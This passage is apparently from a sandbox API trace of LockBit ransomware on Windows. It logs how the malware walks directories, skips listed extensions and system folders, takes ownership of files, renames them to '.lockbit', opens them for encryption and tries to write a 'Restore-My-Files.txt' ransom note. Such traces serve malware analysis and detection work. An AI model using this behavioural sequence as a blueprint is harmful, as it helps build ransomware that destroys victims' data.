cAlternateFileName="")) returned 1 [0079.525] lstrcmpiW (lpString1=".", lpString2="tipresx.dll.mui") returned -1 [0079.525] lstrcmpiW (lpString1="..", lpString2="tipresx.dll.mui") returned -1 [0079.525] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0079.525] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0079.525] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0079.525] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0079.525] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0079.526] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0079.526] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0079.526] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0079.526] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0079.526] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0079.526] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0079.526] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0079.526] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0079.526] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0079.526] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0079.526] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0079.526] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0079.526] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0079.526] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0079.526] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0079.526] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0079.526] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0079.526] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0079.526] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0079.526] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0079.526] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.527] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0079.527] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0079.527] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0079.527] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0079.527] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0079.527] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0079.527] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0079.527] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0079.527] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0079.527] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0079.527] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0079.527] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0079.527] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0079.527] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0079.527] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0079.527] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0079.527] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0079.527] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.527] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0079.527] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0079.527] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0079.527] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0079.528] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="tipresx.dll.mui") returned -1 [0079.528] lstrcmpiW (lpString1="ntldr", lpString2="tipresx.dll.mui") returned -1 [0079.528] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="tipresx.dll.mui") returned -1 [0079.528] lstrcmpiW (lpString1="bootsect.bak", lpString2="tipresx.dll.mui") returned -1 [0079.528] lstrcmpiW (lpString1="autorun.inf", lpString2="tipresx.dll.mui") returned -1 [0079.528] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0079.528] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui") returned=".mui" [0079.528] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0079.528] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0079.528] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0079.528] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0079.528] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0079.528] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0079.528] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0079.528] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0079.528] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0079.529] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0079.529] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0079.529] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0079.529] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0079.529] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0079.529] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0079.529] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0079.529] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0079.529] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0079.529] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0079.529] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0079.529] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0079.529] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0079.529] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0079.529] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0079.529] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0079.529] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0079.529] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0079.529] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0079.529] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui.lockbit") returned 81 [0079.529] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.529] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui.lockbit")) returned 0 [0079.530] GetLastError () returned 0x5 [0079.530] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0079.530] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0079.530] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.530] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0079.531] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0079.531] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3c0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0079.532] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0079.532] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0079.547] NtClose (Handle=0x3c0) returned 0x0 [0079.548] RtlFreeAnsiString (AnsiString="\\") [0079.548] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3c0) returned 1 [0079.548] malloc (_Size=0x200) returned 0x53fcc0 [0079.548] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0079.548] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.548] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.548] CloseHandle (hObject=0x3c0) returned 1 [0079.548] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0079.548] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0079.549] free (_Block=0x53fcc0) [0079.549] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.549] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui.lockbit")) returned 1 [0079.550] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0079.551] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0079.551] malloc (_Size=0x40068) returned 0x206b860 [0079.551] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=3584) returned 1 [0079.551] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0079.707] GetLastError () returned 0x3e5 [0079.707] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0079.707] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0079.707] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.707] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="TipTsf.dll.mui", cAlternateFileName="")) returned 1 [0079.707] lstrcmpiW (lpString1=".", lpString2="TipTsf.dll.mui") returned -1 [0079.707] lstrcmpiW (lpString1="..", lpString2="TipTsf.dll.mui") returned -1 [0079.707] PathFindExtensionW (pszPath="TipTsf.dll.mui") returned=".mui" [0079.707] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0079.707] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0079.707] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0079.707] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0079.707] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0079.707] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0079.708] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0079.708] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0079.708] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0079.708] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0079.708] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0079.708] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0079.708] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0079.708] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0079.708] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0079.708] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0079.708] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0079.708] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0079.708] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0079.708] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0079.708] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0079.708] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0079.708] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0079.708] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0079.708] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.708] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0079.708] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0079.708] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0079.708] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0079.708] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0079.708] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0079.708] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0079.708] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0079.708] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0079.708] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0079.709] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0079.709] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0079.709] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0079.709] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0079.709] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0079.709] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0079.709] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0079.709] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.709] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0079.709] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0079.709] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0079.709] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0079.709] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TipTsf.dll.mui") returned -1 [0079.709] lstrcmpiW (lpString1="ntldr", lpString2="TipTsf.dll.mui") returned -1 [0079.709] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TipTsf.dll.mui") returned -1 [0079.709] lstrcmpiW (lpString1="bootsect.bak", lpString2="TipTsf.dll.mui") returned -1 [0079.709] lstrcmpiW (lpString1="autorun.inf", lpString2="TipTsf.dll.mui") returned -1 [0079.709] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0079.709] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui") returned=".mui" [0079.709] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0079.709] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0079.709] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0079.709] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0079.709] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0079.709] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0079.709] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0079.710] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0079.710] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0079.710] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0079.710] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0079.710] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0079.710] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0079.710] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0079.710] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0079.710] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0079.710] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0079.710] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0079.710] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0079.710] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0079.710] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0079.710] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0079.710] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0079.710] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0079.710] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0079.710] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0079.710] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0079.710] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0079.710] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui.lockbit") returned 80 [0079.710] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.711] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui.lockbit")) returned 0 [0079.711] GetLastError () returned 0x5 [0079.711] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0079.711] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0079.711] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.712] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0079.712] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0079.712] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3bc, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0079.712] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0079.712] NtQueryInformationFile (in: FileHandle=0x3bc, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0079.725] NtClose (Handle=0x3bc) returned 0x0 [0079.725] RtlFreeAnsiString (AnsiString="\\") [0079.725] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3bc) returned 1 [0079.725] malloc (_Size=0x200) returned 0x53fcc0 [0079.725] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0079.725] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.725] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.725] CloseHandle (hObject=0x3bc) returned 1 [0079.725] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0079.726] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0079.726] free (_Block=0x53fcc0) [0079.726] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.727] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui.lockbit")) returned 1 [0079.727] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0079.728] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0079.728] malloc (_Size=0x40068) returned 0x3940048 [0079.728] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3940060 | out: lpFileSize=0x3940060*=3072) returned 1 [0079.728] ReadFile (in: hFile=0x3bc, lpBuffer=0x394007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0079.729] GetLastError () returned 0x3e5 [0079.729] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0079.729] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0079.729] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.729] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="TipTsf.dll.mui", cAlternateFileName="")) returned 0 [0079.729] GetLastError () returned 0x12 [0079.729] FindClose (in: hFindFile=0x2e3290 | out: hFindFile=0x2e3290) returned 1 [0079.729] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="es-ES", cAlternateFileName="")) returned 1 [0079.729] lstrcmpiW (lpString1=".", lpString2="es-ES") returned -1 [0079.729] lstrcmpiW (lpString1="..", lpString2="es-ES") returned -1 [0079.729] lstrcmpiW (lpString1="es-ES", lpString2="$windows.~bt") returned 1 [0079.729] lstrcmpiW (lpString1="es-ES", lpString2="intel") returned -1 [0079.729] lstrcmpiW (lpString1="es-ES", lpString2="msocache") returned -1 [0079.729] lstrcmpiW (lpString1="es-ES", lpString2="$recycle.bin") returned 1 [0079.729] lstrcmpiW (lpString1="es-ES", lpString2="$windows.~ws") returned 1 [0079.729] lstrcmpiW (lpString1="es-ES", lpString2="tor browser") returned -1 [0079.730] lstrcmpiW (lpString1="es-ES", lpString2="boot") returned 1 [0079.730] lstrcmpiW (lpString1="es-ES", lpString2="system volume information") returned -1 [0079.730] lstrcmpiW (lpString1="es-ES", lpString2="perflogs") returned -1 [0079.730] lstrcmpiW 